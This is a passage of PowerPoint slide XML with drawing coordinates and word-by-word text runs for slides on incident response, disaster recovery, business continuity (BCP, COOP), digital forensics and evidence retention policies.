                <a:lnTo>
                  <a:pt x="371855" y="748284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="418498" y="745368"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="463412" y="736857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="506250" y="723099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546662" y="704446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="584300" y="681249"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="618815" y="653857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="649860" y="622623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="677084" y="587895"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="700140" y="550026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="718680" y="509365"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="732354" y="466264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="740814" y="421072"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="743711" y="374141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="740814" y="327211"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="732354" y="282019"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="718680" y="238918"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="700140" y="198257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="677084" y="160388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="649860" y="125660"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="618815" y="94426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="584300" y="67034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546662" y="43837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="506250" y="25184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="463412" y="11426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="418498" y="2915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="371855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700910" y="5058917"/>
            <a:ext cx="3454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0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>01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39060" y="4644999"/>
            <a:ext cx="5051425" cy="106807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2000" spc="95" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Disaster</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-105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000" spc="50" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>recovery</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-105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000" spc="100" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>plan</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPct val="113999"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="60">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Maintains</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-1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45">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>response</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-3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75">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-1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45">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>recovery</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-3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60">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>planning </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-51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120">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-2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95">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>major</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-2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50">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>incidents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39060" y="6165316"/>
            <a:ext cx="4330065" cy="72072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2000" spc="110" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Business</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-95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000" spc="75" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Continuity</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-114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000" spc="60" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Plan(BCP)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2000" spc="30">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Makes</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5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30">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>business</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-4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65">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>procedures</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-4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55">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>resilient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39060" y="7299858"/>
            <a:ext cx="5346065" cy="72072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2000" spc="75" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Continuity</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-110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000" spc="110" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Of</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-90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000" spc="90" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Operation</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-120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000" spc="100" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Planning</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-125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000" spc="65" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>(COOP)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2000" spc="20">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Used</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-3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120">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-3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80">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>government</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-1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25">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>facilities,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-6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60">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>similar</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-3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120">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-2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20">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>BCP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86076" y="3278530"/>
            <a:ext cx="4737735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98450">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="75" b="1">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Incident </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="95" b="1">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Response </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="75" b="1">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="100" b="1">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Disaster </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="105" b="1">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="55" b="1">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Recovery</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-95" b="1">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="135" b="1">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-100" b="1">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="114" b="1">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Business</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-100" b="1">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="80" b="1">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Continuity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166984" y="3395853"/>
            <a:ext cx="4345305" cy="38608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28575" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="635">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="225"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="75" b="1">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Incident</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-90" b="1">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="95" b="1">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Response</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-90" b="1">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="75" b="1">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-85" b="1">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="55" b="1">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Forensics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863453" y="3781425"/>
            <a:ext cx="2890520" cy="3810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29209" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="635">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="229"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="135" b="1">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-114" b="1">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="75" b="1">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Retention</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-85" b="1">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="50" b="1">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Policy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311510" y="5123154"/>
            <a:ext cx="4478020" cy="106807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2000" spc="80" b="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Digital</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-120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000" spc="65" b="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>forensics</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPct val="113999"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Ensures</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-4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100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dirty="0" sz="2000" spc="-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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>there</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-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dirty="0" sz="20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100">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>no</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>manipulation </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5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105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dirty="0" sz="2000" spc="-4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9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45">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>data.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311510" y="6551777"/>
            <a:ext cx="4453890" cy="1068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3999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="75" b="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Retention </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="55" b="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>policies </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="120">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="30">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>evidence </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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65">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>preservation</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5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dirty="0" sz="20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110">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>important</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-4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12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dirty="0" sz="2000" spc="-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65">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>incident </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5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60">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>handling</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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000" spc="-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90">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>threat</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-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50">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>handling.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501139" y="6108191"/>
            <a:ext cx="744220" cy="748665"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="744219" h="748665">
                <a:moveTo>
                  <a:pt x="371855" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="325213" y="2915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="280299" y="11426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="237461" y="25184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="197049" y="43837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159411" y="67034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124896" y="94426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="93851" y="125660"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66627" y="160388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43571" y="198257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25031" y="238918"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11357" y="282019"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2897" y="327211"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="374141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2897" y="421072"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11357" y="466264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25031" y="509365"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43571" y="550026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66627" y="587895"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="93851" y="622623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124896" y="653857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159411" y="681249"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="197049" y="704446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="237461" y="723099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="280299" y="736857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325213" y="745368"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="371855" y="748283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="418498" y="745368"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="463412" y="736857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="506250" y="723099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546662" y="704446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="584300" y="681249"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="618815" y="653857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="649860" y="622623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="677084" y="587895"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="700140" y="550026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="718680" y="509365"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="732354" y="466264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="740814" y="421072"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="743711" y="374141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="740814" y="327211"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="732354" y="282019"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="718680" y="238918"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="700140" y="198257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="677084" y="160388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="649860" y="125660"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="618815" y="94426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="584300" y="67034"/>
                </a:lnTo>
                <a:lnTo>
